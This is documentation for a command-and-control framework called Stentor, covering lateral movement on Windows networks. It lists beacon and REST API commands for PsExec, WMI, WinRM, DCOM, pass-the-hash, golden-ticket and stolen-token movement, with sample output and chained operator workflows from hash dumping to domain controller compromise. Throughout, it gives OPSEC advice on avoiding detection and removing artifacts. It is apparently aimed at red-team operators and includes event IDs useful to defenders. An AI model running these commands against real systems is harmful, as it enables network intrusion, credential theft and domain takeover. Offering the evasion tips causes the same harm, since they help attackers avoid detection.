Lateral Movement¶

Lateral movement in Stentor uses two command patterns: remote-exec for running commands on remote hosts, and jump for deploying new beacons. Five transport techniques are available — PsExec (SMB), WMI (DCOM), WinRM, DCOM objects, and Pass-the-Hash — each with different protocol requirements and OPSEC profiles.

sequenceDiagram
    participant A as Beacon A
    participant T as Target Host
    participant C as C2 Server

    A->>T: Lateral technique (SMB/WMI/WinRM/DCOM)
    T->>T: Execute payload (service/process/script)
    T->>C: New beacon callback
    Note over C: Beacon B now active on Target

MITRE ATT&CK

Lateral movement maps to T1021 - Remote Services and its sub-techniques. Pass-the-Hash maps to T1550.002 - Use Alternate Authentication Material.

Lateral Movement Comparison Table¶

Technique	Command	Protocol	Port(s)	Credential Type	OPSEC Impact	MITRE ATT&CK
PsExec	`remote-exec psexec`	SMB	445	Password / Token	High	T1021.002
WMI	`remote-exec wmi`	DCOM/RPC	135 + dynamic	Password / Token	Medium	T1047
WinRM	`remote-exec winrm`	HTTP/HTTPS	5985/5986	Password / Token	Medium	T1021.006
DCOM	`remote-exec dcom`	DCOM/RPC	135 + dynamic	Password / Token	Medium	T1021.003
Pass-the-Hash	`pth`	SMB	445	NTLM hash	Medium	T1550.002
Jump PsExec	`jump psexec`	SMB	445	Current token	High	T1021.002
Jump WinRM	`jump winrm`	HTTP	5985	Current token	Medium	T1021.006

Remote Execution Commands¶

The remote-exec commands run a single command on a remote host and return the output. They do not deploy a new beacon — for that, use jump.

PsExecWMIWinRMDCOM

remote-exec psexec¶

PsExec-style service execution via SMB (T1021.002). Connects to the target's SCM over SMB (port 445), creates a temporary service with a random name, executes the command, reads output from a named pipe, and cleans up.

ShellAPI

beacon> remote-exec psexec 10.10.10.50 "whoami /all" admin P@ssw0rd DOMAIN
[*] Connecting to 10.10.10.50 via SMB...
[*] Service created: stentorsvc_a3f8b2c1
[*] Output:
    DOMAIN\admin
    ...
[*] Service deleted, cleanup complete

curl -s -X POST https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "remote-exec psexec 10.10.10.50 \"whoami /all\" admin P@ssw0rd DOMAIN"}'

OPSEC

Forensic artifacts: Windows Service creation (Event ID 7045 — random service name stentorsvc_XXXX). Service binary uploaded to ADMIN$ share via SMB. Service start (Event ID 7036). Service deleted after execution but event log entries persist.

MITRE ATT&CK: T1021.002 — Remote Services: SMB/Windows Admin Shares

remote-exec wmi¶

WMI execution via COM API (T1047). Connects to the target's WMI namespace over DCOM (port 135 + dynamic RPC), creates a Win32_Process via IWbemServices::ExecMethod. Uses direct COM API — does not spawn wmic.exe.

ShellAPI

beacon> remote-exec wmi 10.10.10.50 "ipconfig /all" admin P@ssw0rd DOMAIN
[*] Connecting to 10.10.10.50 via WMI (COM API)...
[*] Win32_Process.Create executed successfully (PID: 4832)

curl -s -X POST https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "remote-exec wmi 10.10.10.50 \"ipconfig /all\" admin P@ssw0rd DOMAIN"}'

OPSEC

Forensic artifacts: DCOM activation (Sysmon Event ID 20/21 — WMI event consumer). RPC traffic on port 135 + dynamic ports. WMI event logs. No child wmic.exe process (direct COM).

MITRE ATT&CK: T1047 — Windows Management Instrumentation

Output capture

WMI Win32_Process.Create does not return command output directly. For output retrieval, redirect to a file on the target and read it via SMB, or use WinRM instead.

remote-exec winrm¶

WinRM execution via Windows Remote Shell (T1021.006). Connects to the target's WinRM service (port 5985 HTTP or 5986 HTTPS) and executes the command via the Windows Remote Shell protocol.

ShellAPI

beacon> remote-exec winrm 10.10.10.50 "whoami /priv" admin P@ssw0rd DOMAIN
[*] Connecting to 10.10.10.50 via WinRM...
[*] Output:
    PRIVILEGES INFORMATION
    ...

curl -s -X POST https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "remote-exec winrm 10.10.10.50 \"whoami /priv\" admin P@ssw0rd DOMAIN"}'

OPSEC

Forensic artifacts: WinRM connection events (Event ID 91, 168). HTTP traffic on port 5985 (or HTTPS 5986). PowerShell script block logging may capture commands.

MITRE ATT&CK: T1021.006 — Remote Services: Windows Remote Management

Best for output

WinRM natively returns command output, making it the best choice when you need to see results. It also supports HTTPS (port 5986) for encrypted transport.

remote-exec dcom¶

DCOM-based execution via COM objects (T1021.003). Uses COM objects like ShellBrowserWindow or MMC20.Application for remote command execution over DCOM (port 135 + dynamic RPC).

ShellAPI

beacon> remote-exec dcom 10.10.10.50 "calc.exe" admin P@ssw0rd DOMAIN
[*] Connecting to 10.10.10.50 via DCOM...
[*] Process created via ShellBrowserWindow

curl -s -X POST https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "remote-exec dcom 10.10.10.50 \"calc.exe\" admin P@ssw0rd DOMAIN"}'

OPSEC

Forensic artifacts: DCOM activation events. RPC traffic on port 135 + dynamic ports. COM object instantiation logs.

MITRE ATT&CK: T1021.003 — Remote Services: Distributed Component Object Model

Pass-the-Hash¶

pth¶

Authenticate to a remote host using an NTLM hash instead of a cleartext password (T1550.002). Uses SMB2 with NTLM hash-based authentication via go-smb2 NTLMInitiator.

Hash format: LM:NT or just NT (32-character hex). LM hash is ignored in modern Windows — you can use aad3b435b51404eeaad3b435b51404ee as a placeholder.

ShellAPI

beacon> pth 10.10.10.50 admin aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 "whoami" DOMAIN
[*] Authenticating to 10.10.10.50 via Pass-the-Hash (SMB2)...
[*] ADMIN$ share access verified
[*] Service created, executing command...
[*] Output: DOMAIN\admin

curl -s -X POST https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "pth 10.10.10.50 admin aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 \"whoami\" DOMAIN"}'

OPSEC

Forensic artifacts: NTLM authentication events (Event ID 4624, Logon Type 3 — Network). SMB session establishment. Same service creation artifacts as PsExec if executing commands.

MITRE ATT&CK: T1550.002 — Use Alternate Authentication Material: Pass the Hash

Hash sources

NTLM hashes can be obtained from: hashdump (local SAM), logonpasswords (LSASS memory), dcsync (domain replication), or ntds_dump (AD database). See the Credential Access page for details.

Jump Commands (Beacon Deployment)¶

The jump commands deploy a new beacon on a remote host. Unlike remote-exec (which runs a command and returns output), jump generates a beacon payload for the specified listener and delivers it to the target.

Authentication

Jump commands use the current impersonation token for authentication. Set credentials first using make_token or steal_token before running jump commands. See the Privilege Escalation page for token manipulation details.

jump psexec¶

Deploy a beacon via PsExec service creation (T1021.002). Generates an x86 beacon EXE for the specified listener, uploads it to the target's ADMIN$ share via SMB, creates a Windows service pointing to the uploaded binary, and starts the service.

ShellAPI

beacon> jump psexec 10.10.10.50 https-listener
[*] Uploading beacon to \\10.10.10.50\ADMIN$\stentorsvc_7a2b.exe
[*] Service stentorsvc_7a2b created and started
[+] New beacon: DOMAIN\admin @ 10.10.10.50 (SYSTEM)

curl -s -X POST https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "jump psexec 10.10.10.50 https-listener"}'

OPSEC

Service binary uploaded to ADMIN$ share. Service creation event (Event ID 7045). The beacon runs as SYSTEM (service context). Service is cleaned up after beacon connects.

jump psexec64¶

Same as jump psexec but generates an x64 beacon payload. Use on 64-bit targets for native execution.

beacon> jump psexec64 10.10.10.50 https-listener

jump psexec_psh¶

Deploy beacon via PsExec with a PowerShell stager. Creates a service that runs powershell.exe with an encoded beacon download cradle instead of uploading a service binary.

beacon> jump psexec_psh 10.10.10.50 https-listener

OPSEC

Spawns powershell.exe on the target host. PowerShell script block logging and AMSI may detect the stager. Higher detection surface than binary-based jump variants. Use jump psexec or jump psexec64 in monitored environments.

jump winrm¶

Deploy beacon via WinRM (T1021.006). Generates a PowerShell stager and executes it on the target via WinRM.

beacon> jump winrm 10.10.10.50 https-listener
[*] Executing PowerShell stager via WinRM on 10.10.10.50
[+] New beacon: DOMAIN\admin @ 10.10.10.50

jump winrm64¶

Same as jump winrm but generates an x64 beacon payload.

beacon> jump winrm64 10.10.10.50 https-listener

WinRM vs PsExec for jump

PsExec jump runs as SYSTEM (service context) — useful for full system access
WinRM jump runs as the authenticated user — useful when you want to maintain the user context
PsExec requires SMB (port 445); WinRM requires HTTP (port 5985) or HTTPS (port 5986)

Pass-the-Ticket¶

Pass-the-Ticket (T1550.003) uses Kerberos tickets instead of passwords or NTLM hashes for authentication. Tickets can be forged (golden/silver/diamond) or extracted from memory.

Workflow¶

Obtain a Kerberos ticket — Forge with golden_ticket, silver_ticket, or diamond_ticket (see Credential Access), or extract from LSASS with logonpasswords
Import the ticket — Use kerberos_ticket_use or kerberos_ccache_use
Move laterally — Run jump or remote-exec commands, which will authenticate using the imported ticket

Shellccache format

# Forge a golden ticket
beacon> golden_ticket /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:e19ccf75ee54e06b06a5907af13cef42

# Import the ticket
beacon> kerberos_ticket_use /path/to/ticket.kirbi
[*] Kerberos ticket imported

# Move laterally using the ticket
beacon> jump psexec dc01.corp.local https-listener
[+] New beacon: CORP\Administrator @ DC01 (SYSTEM)

# Import ccache format (from Linux tools like impacket)
beacon> kerberos_ccache_use /path/to/ticket.ccache
[*] Kerberos ccache imported

Cross-reference

For ticket forging details (golden_ticket, silver_ticket, diamond_ticket, sapphire_ticket), see the Credential Access page.

Credential Handling¶

Lateral movement commands accept credentials in four ways:

Method	How to set	Used by
Password	Inline: `remote-exec <method> <target> <cmd> <user> <pass> [domain]`	`remote-exec` commands
NTLM hash	Inline: `pth <target> <user> <hash> <cmd> [domain]`	`pth` command
Current token	Pre-set: `make_token` or `steal_token` before `jump`	`jump` commands
Kerberos ticket	Pre-import: `kerberos_ticket_use` before `jump`/`remote-exec`	All commands

Token precedence

If you have an active impersonation token (from make_token or steal_token), it takes precedence for network authentication. Use rev2self to clear impersonation before using inline credentials.

WMI Cleanup¶

wmi_cleanup¶

Remove WMI event subscriptions left by WMI-based execution. WMI event subscriptions persist until explicitly removed and can serve as indicators of compromise.

beacon> wmi_cleanup 10.10.10.50 SentorWMI_a3f8
[*] WMI event subscription 'SentorWMI_a3f8' removed from 10.10.10.50

Always clean up

After using WMI for lateral movement, run wmi_cleanup to remove event subscriptions. Lingering WMI subscriptions are a common detection vector and persistence artifact.

Operator Workflows¶

Credential Spray Workflow¶

Use harvested hashes to identify admin access, then deploy a beacon:

# Dump local hashes
beacon> hashdump
[*] admin:1001:aad3b435...:e19ccf75ee54e06b06a5907af13cef42:::

# Verify admin access on target via PtH
beacon> pth 10.10.10.50 admin aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 "whoami" DOMAIN
[*] Output: DOMAIN\admin

# Deploy beacon
beacon> make_token DOMAIN\admin P@ssw0rd
beacon> jump psexec 10.10.10.50 https-listener
[+] New beacon on 10.10.10.50
beacon> rev2self

Token-Based Lateral Movement¶

Use a stolen token for lateral movement without knowing credentials:

# Find a domain admin process
beacon> ps
[*] PID   PPID  Name            User
    1234  456   explorer.exe    DOMAIN\DomainAdmin

# Steal the token and move laterally
beacon> steal_token 1234
[*] Impersonating DOMAIN\DomainAdmin

beacon> jump winrm dc01.corp.local https-listener
[+] New beacon: DOMAIN\DomainAdmin @ DC01

beacon> rev2self

Kerberos Lateral Movement¶

Kerberoast a service account, crack offline, then move:

# Kerberoast to find crackable service accounts
beacon> kerberoast
[*] SPN: MSSQLSvc/sql01.corp.local - hash saved

# After offline cracking...
beacon> make_token DOMAIN\svc_sql CrackedP@ss
[*] Impersonating DOMAIN\svc_sql (network logon)

beacon> jump psexec sql01.corp.local https-listener
[+] New beacon on sql01.corp.local

beacon> rev2self

Golden Ticket Lateral Movement¶

Forge a TGT and use it for unrestricted lateral movement:

# Forge golden ticket (requires krbtgt hash from DCSync)
beacon> golden_ticket /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:e19ccf75...

# Import the forged ticket
beacon> kerberos_ticket_use ticket.kirbi

# Move to any host in the domain
beacon> jump psexec dc01.corp.local https-listener
[+] New beacon: CORP\Administrator @ DC01 (SYSTEM)

beacon> jump psexec fileserver.corp.local https-listener
[+] New beacon: CORP\Administrator @ FILESERVER (SYSTEM)